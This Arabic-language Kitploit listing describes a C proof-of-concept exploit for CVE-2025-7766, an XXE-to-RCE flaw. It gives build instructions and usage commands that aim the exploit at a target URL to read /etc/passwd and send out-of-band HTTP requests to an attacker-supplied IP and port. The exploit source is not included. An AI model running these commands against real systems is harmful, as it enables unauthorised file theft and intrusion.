Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-7766 — استغلال PoC مبني على C لـ CVE-2025-7766 يوضح XXE-to-RCE عبر قراءة الملفات واستدعاءات HTTP خارج النطاق. يدعم حمولات XML مخصصة وطلبات متكررة. | Kitploit
أدوات/GitHubGitHub/bytereaper77/cve-2025-7766
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولاتArchived
GitHubbytereaper77/cve-2025-7766

CVE-2025-7766

استغلال PoC مبني على C لـ CVE-2025-7766 يوضح XXE-to-RCE عبر قراءة الملفات واستدعاءات HTTP خارج النطاق. يدعم حمولات XML مخصصة وطلبات متكررة.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال PoC لـ CVE-2025-7766

PoC لاستغلال ثغرة الكيان الخارجي XML في CVE-2025-7766. يوضح قراءة الملفات (/etc/passwd) واستدعاءات HTTP خارج النطاق.

المؤلف: Byte Reaper

CVE: CVE-2025-7766

الثغرة: تنفيذ تعليمات برمجية عن بُعد عبر الكيان الخارجي XML (XXE)


PoC لاستغلال XXE في CVE-2025-7766. يوضح:

  • قراءة /etc/passwd من الهدف.
  • تشغيل طلب HTTP خارج النطاق إلى خادمك.

المتطلبات

  • gcc
  • libcurl
  • argparse library

البناء

root@kitploit:~
gcc -o exploit exploit.c argparse.c -lcurl

الاستخدام

root@kitploit:~
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v

الترخيص:

MIT

تنزيل الأداة